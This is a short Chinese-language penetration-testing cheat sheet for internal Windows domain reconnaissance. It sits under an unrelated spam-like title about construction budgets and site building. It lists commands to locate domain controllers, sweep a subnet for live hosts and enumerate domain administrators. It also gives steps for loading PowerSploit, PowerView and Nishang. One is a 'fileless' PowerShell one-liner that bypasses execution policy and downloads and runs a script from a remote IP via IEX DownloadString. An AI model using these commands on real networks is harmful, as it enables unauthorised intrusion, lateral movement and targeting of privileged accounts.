工程预算培训_一分钟建站_网站流量_软文范例大全500字

net config workstation

net time /domain

1.存在域，但是当前用户不是域用户

发生系统错误 拒绝访问

2.存在域，当前用户是域用户

显示对应域名、时间

3.当前网络环境为工作组，不存在域

找不到域控

net config workstation查询域

nltest /dcli's't:域名 查询域控

ping 域控 或者 nslookup 域控 获取域控ip

arp -a 获取通讯记录，可能找到其他机器ip所属网段

for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1|find /i "ttl=" bat命令检查存活机器

查询用户信息

net user /domain 查询域用户

net group "domain admins" /domain 查询域管

net localgroup administrators 查询本地管理员组，通常包含本地administrator和域管administrator

wmic useraccount get/all

定位域管理员

net group "domain admins" /domain

powershell

powersploit

有文件落地

import-module 模块路径;get-command -module xxx 查看导入模块的命令列表

import-module 模块路径;命令 执行模块的命令

无文件落地

powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://ip:8844/PowerView.ps1');import-module .\PowerView.ps1;Get-NetShare

nishang

nihsang放在cs client目录下

powershell-import nishang/nishang.psm1

get-command -module nishang

nishang的get-information一键收集信息